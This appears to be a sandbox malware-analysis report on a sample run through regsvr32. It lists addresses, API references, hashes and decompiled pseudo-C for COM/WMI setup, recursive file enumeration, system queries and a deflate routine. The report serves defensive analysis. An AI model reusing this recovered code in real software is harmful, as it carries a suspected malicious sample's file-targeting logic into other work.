            0x00000000
            0x031768a3
            0x031768a3
            0x00000000
            0x031768a3
            0x03176897
            0x03176875
            0x03176adc
            0x03176ade
            0x03176ae1
            0x03176ae3
            0x03176ae7
            0x03176aea
            0x03176aef
            0x03176af2
            0x03176af5
            0x03176afc
            0x03176afc
            0x03176b02
            0x03176b04
            0x03176b07
            0x03176b0a
            0x03176b0d
            0x03176b10
            0x03176b13
            0x03176b13
            0x03176b16
            0x03176b19
            0x03176b1c
            0x03176b1f
            0x03176b22
            0x03176b22
            0x03176b25
            0x03176b28
            0x03176b2c
            0x00000000
            0x00000000
            0x03176b49
            0x03176b4e
            0x03176c36
            0x00000000
            0x00000000
            0x03176c3f
            0x03176c42
            0x03176c4e
            0x00000000
            0x03176c4e
            0x03176b54
            0x03176b57
            0x03176b59
            0x03176b5c
            0x03176b5f
            0x03176b62
            0x03176b6b
            0x03176b6b
            0x03176b6d
            0x03176b73
            0x03176b75
            0x03176b78
            0x03176b7b
            0x03176b7e
            0x03176b81
            0x03176b84
            0x03176b84
            0x03176b8b
            0x03176b8e
            0x03176b91
            0x03176b94
            0x03176b97
            0x03176b97
            0x03176b9c
            0x03176b9f
            0x03176ba1
            0x03176ba6
            0x00000000
            0x00000000
            0x03176c5a
            0x00000000
            0x00000000
            0x03176c63
            0x03176c66
            0x03176c76
            0x03176c76
            0x03176bac
            0x03176baf
            0x03176c0b
            0x03176bc5
            0x03176bc5
            0x03176bcb
            0x03176bd1
            0x03176c82
            0x03176c86
            0x03176c88
            0x03176c8e
            0x00000000
            0x00000000
            0x03176c94
            0x03176c9b
            0x03176cbd
            0x03176cc3
            0x03176cef
            0x03176cf3
            0x03176cf5
            0x03176cf7
            0x03176cf7
            0x03176cf7
            0x03176cfb
            0x03176cfb
            0x03176cc5
            0x03176ccb
            0x03176ccd
            0x03176cd1
            0x03176cd3
            0x03176cd5
            0x03176cd5
            0x03176cd5
            0x03176cd7
            0x03176cdb
            0x03176ce1
            0x03176ce3
            0x03176ce5
            0x03176ce5
            0x03176ce5
            0x03176ce9
            0x03176ce9
            0x03176ce1
            0x03176cd1
            0x03176c9d
            0x03176c9f
            0x03176ca3
            0x03176ca5
            0x03176ca7
            0x03176ca7
            0x03176ca7
            0x03176cab
            0x03176cab
            0x03176ca3
            0x03176cfd
            0x03176cff
            0x03176cff
            0x03176cff
            0x03176d01
            0x03176d05
            0x00000000
            0x03176d05
            0x03176bdb
            0x03176bdd
            0x03176be2
            0x03176bea
            0x03176bed
            0x03176bf0
            0x03176bf6
            0x03176bf6
            0x03176bf6
            0x03176bf8
            0x03176bfc
            0x00000000
            0x03176c13
            0x03176c13
            0x03176c16
            0x03176c18
            0x03176c1b
            0x03176c1e
            0x03176c21
            0x03176c24
            0x03176c27
            0x03176c27
            0x03176c27
            0x03176c29
            0x03176b32
            0x03176b36
            0x00000000
            0x00000000
            0x00000000
            0x03176b36
            0x03176c0b
            0x03176bb1
            0x03176bb4
            0x03176bb7
            0x03176bba
            0x03176bc3
            0x00000000
            0x03176bc3
            0x03176b2e
            0x03176b31
            0x00000000
            0x03176b3c
            0x03176b3c
            0x00000000
            0x03176b42

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
            • API String ID: 0-3089872807
            • Opcode ID: fbb05e6fe0b93efaddebcb248550951ec077045e3aba002fa38e901129f9423b
            • Instruction ID: e5e93863c81db101ae714a2836a808b42ecec1f7ca8d792261b10356b704a4b4
            • Opcode Fuzzy Hash: fbb05e6fe0b93efaddebcb248550951ec077045e3aba002fa38e901129f9423b
            • Instruction Fuzzy Hash: E4120432A08B558FC719CE38C59426ABBF1EB8C354F4D862DE895D7B05D371E988CB81
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316E485 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E0316E485(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x317c8a0, 0, 1, 0x317c8b0, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E03168DC9(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













            0x0316e492
            0x0316e495
            0x0316e498
            0x0316e4a9
            0x0316e4af
            0x0316e4c0
            0x0316e4c8
            0x0316e519
            0x0316e519
            0x0316e51e
            0x0316e523
            0x0316e523
            0x0316e526
            0x0316e52b
            0x0316e530
            0x0316e530
            0x0316e533
            0x0316e4ca
            0x0316e4cb
            0x0316e4d1
            0x0316e4e2
            0x0316e4e7
            0x00000000
            0x0316e4e9
            0x0316e4f6
            0x0316e4fe
            0x00000000
            0x0316e500
            0x0316e502
            0x0316e50a
            0x00000000
            0x0316e50c
            0x0316e50f
            0x0316e515
            0x0316e515
            0x0316e50a
            0x0316e4fe
            0x0316e4e7
            0x0316e538

            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E498
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4A9
            • CoCreateInstance.OLE32(0317C8A0,00000000,00000001,0317C8B0,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4C0
            • SysAllocString.OLEAUT32(00000000), ref: 0316E4CB
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0316E7B4,00000E16,00000000,00000000,00000005), ref: 0316E4F6
              • Part of subcall function 03168DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
            • API String ID: 1610782348-0
            • Opcode ID: bbc4f4d5384a81f093b55f8fc2624197b210edeb83f2daf1a27023c68b330b00
            • Instruction ID: 2f596e7c65217c6bb59c858be9550b7205e7eb8866a5c2c1d6cf8dfdbb6fdfab
            • Opcode Fuzzy Hash: bbc4f4d5384a81f093b55f8fc2624197b210edeb83f2daf1a27023c68b330b00
            • Instruction Fuzzy Hash: B1213A78600245BFDB289BA6DD5CE9BBF7CEFCAB25F04015CB505A6190D770DA50CA70
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316C123 Relevance: 3.1, APIs: 2, Instructions: 105fileCOMMON
            Download Yara Rule
            C-Code - Quality: 78%
            			E0316C123(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E03169C50(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E03168DDF( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0316C0FB( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push(0x317c9d8);
						_t60 = E03169C50(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x317f8d0; // 0x4faf8c0
							 *((intOrPtr*)(_t54 + 0xc0))(1);
							_push(1);
							_push(1);
							_push(0);
							E0316C123(_t60, _t75, 1, 5, E0317017A, _a16);
							_t63 = _t63 + 0x1c;
							E03168DDF( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_t7 = _t61 + 0x317f9dc; // 0x0
						_push( *_t7);
						_push( &(_v608.cFileName));
						_t41 =  *0x317f8dc; // 0x4fafb90
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E0317017A(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x317f8d0; // 0x4faf8c0
						 *((intOrPtr*)(_t46 + 0xc0))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x317f8d0; // 0x4faf8c0
				 *((intOrPtr*)(_t31 + 0x80))(_t59);
				goto L14;
			}



















            0x0316c123
            0x0316c12f
            0x0316c131
            0x0316c133
            0x0316c139
            0x0316c13e
            0x0316c141
            0x0316c146
            0x0316c262
            0x0316c262
            0x0316c15a
            0x0316c15f
            0x0316c251
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316c165
            0x0316c165
            0x0316c172
            0x00000000
            0x00000000
            0x0316c180
            0x0316c1d3
            0x0316c1d3
            0x0316c1db
            0x0316c1dc
            0x0316c1e7
            0x0316c1e9
            0x0316c1ec
            0x0316c1f1
            0x0316c1f3
            0x0316c1fb
            0x0316c201
            0x0316c203
            0x0316c205
            0x0316c21a
            0x0316c21f
            0x0316c228
            0x0316c22e
            0x00000000
            0x0316c1f1
            0x0316c182
            0x0316c184
            0x0316c184
            0x0316c184
            0x0316c190
            0x0316c191
            0x0316c19b
            0x00000000
            0x00000000
            0x0316c1a8
            0x0316c1ad
            0x0316c1b2
            0x00000000
            0x00000000
            0x0316c1b4
            0x0316c1bb
            0x0316c1c1
            0x0316c1c1
            0x0316c1c4
            0x0316c1d1
            0x00000000
            0x00000000
            0x00000000
            0x0316c22f
            0x0316c23d
            0x0316c245
            0x0316c24b
            0x00000000

            APIs
            • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 0316C154
            • FindNextFileW.KERNEL32(00000000,?), ref: 0316C237
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: FileFind$FirstNext
            • String ID:
            • API String ID: 1690352074-0
            • Opcode ID: 83b0ede5e3a3b15acb435da1470e0299ea790cd712980072fab98460440c1358
            • Instruction ID: 49757ec99c9f4c3b9c2909df3389f7bb27222eec7563c7fa2243e4152ce311d4
            • Opcode Fuzzy Hash: 83b0ede5e3a3b15acb435da1470e0299ea790cd712980072fab98460440c1358
            • Instruction Fuzzy Hash: A831C472A00314AFDB10EBE49C49FAB77B9AB4C710F1800A4F915E61C1EB7199A18BE0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316A1F8 Relevance: 1.5, APIs: 1, Instructions: 24timeCOMMON
            Download Yara Rule
            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,0316521F,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0316A205
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Time$FileSystem
            • String ID:
            • API String ID: 2086374402-0
            • Opcode ID: 77f886fbb8b3d5d9b9fa33a0efb9e4fd6be3658280f90d74204f0435cad07244
            • Instruction ID: 7cc62371f0ed96cdb2d7bbcc61a4364b995669be4e00b2eeba5e549e3e95e301
            • Opcode Fuzzy Hash: 77f886fbb8b3d5d9b9fa33a0efb9e4fd6be3658280f90d74204f0435cad07244
            • Instruction Fuzzy Hash: 34E04875D003146FD710EE689D05F5AFBBDEB84600F5545559C41F7344E670AA048690
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316DDE7 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0316DDE7(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}





            0x0316ddef
            0x0316ddfa
            0x0316de05
            0x0316ddf1
            0x0316ddf3
            0x0316ddf5
            0x0316ddf5

            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0316E1C0), ref: 0316DDFA
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: a30bf8f36294ea15e62829ed31cda25f7f7d415ede12237d95b1e638ad1e5e8b
            • Instruction ID: 30a23b75d22ec34b4ccca6b661df05e35e2b0be8cb40fa87eed318069ef1594c
            • Opcode Fuzzy Hash: a30bf8f36294ea15e62829ed31cda25f7f7d415ede12237d95b1e638ad1e5e8b
            • Instruction Fuzzy Hash: 65C01261A0020A97CF14ABA5B9166EEB2FC5B48549F140495ED02F10C1EA60D99542B0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 031782A0 Relevance: .4, Instructions: 359COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 99%
            			E031782A0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x5d08408b
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0xfeacb58c
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0xfffffeac
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0x5750038
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x8b057500
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x5d08408b
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x8b057500
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x3fc458b
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0xb58c03fc
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0x5750038
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x8b057500
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x5d08408b
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x5d08408e
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0x5750038
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x8b057500
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0xfffffeac
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0xfeac8d94
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x5d08408b
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0x5750038
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x8b057500
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x5d08408b
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0xc80bc323
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x5d08408b
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x458bc80b
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0x5750038
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x8b057500
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x5d08408b
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x5d08408d
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x8b057500
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x5d08408b
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0xfffffeac
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0x5750038
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x8b057500
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x5d08408b
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}
























































            0x031782a3
            0x031782aa
            0x031782ae
            0x031782b0
            0x031782b2
            0x031782b8
            0x031787a5
            0x031787ab
            0x031782be
            0x031782ca
            0x031782d7
            0x031782da
            0x031782e1
            0x031782e4
            0x031782e7
            0x031782ea
            0x031782eb
            0x031782ee
            0x031782f4
            0x031782f7
            0x031782fc
            0x0317830c
            0x0317830e
            0x031783c4
            0x03178553
            0x03178553
            0x0317855c
            0x0317866f
            0x0317866f
            0x03178676
            0x03178676
            0x0317867f
            0x0317868c
            0x03178695
            0x03178698
            0x0317869d
            0x031786e5
            0x0317869f
            0x0317869f
            0x031786a2
            0x031786a9
            0x031786af
            0x031786b2
            0x031786b5
            0x031786b8
            0x031786bb
            0x031786be
            0x031786c4
            0x031786d2
            0x031786d5
            0x031786d8
            0x031786e1
            0x031786e1
            0x031786e8
            0x031786eb
            0x031786f1
            0x031786f8
            0x031786fe
            0x0317874c
            0x03178758
            0x0317875f
            0x03178700
            0x03178700
            0x03178703
            0x0317870c
            0x0317870f
            0x03178712
            0x03178719
            0x0317871c
            0x0317871f
            0x03178722
            0x03178725
            0x0317872b
            0x03178736
            0x0317873c
            0x03178743
            0x03178743
            0x00000000
            0x031786fe
            0x03178562
            0x03178562
            0x03178569
            0x03178569
            0x03178572
            0x0317857f
            0x03178588
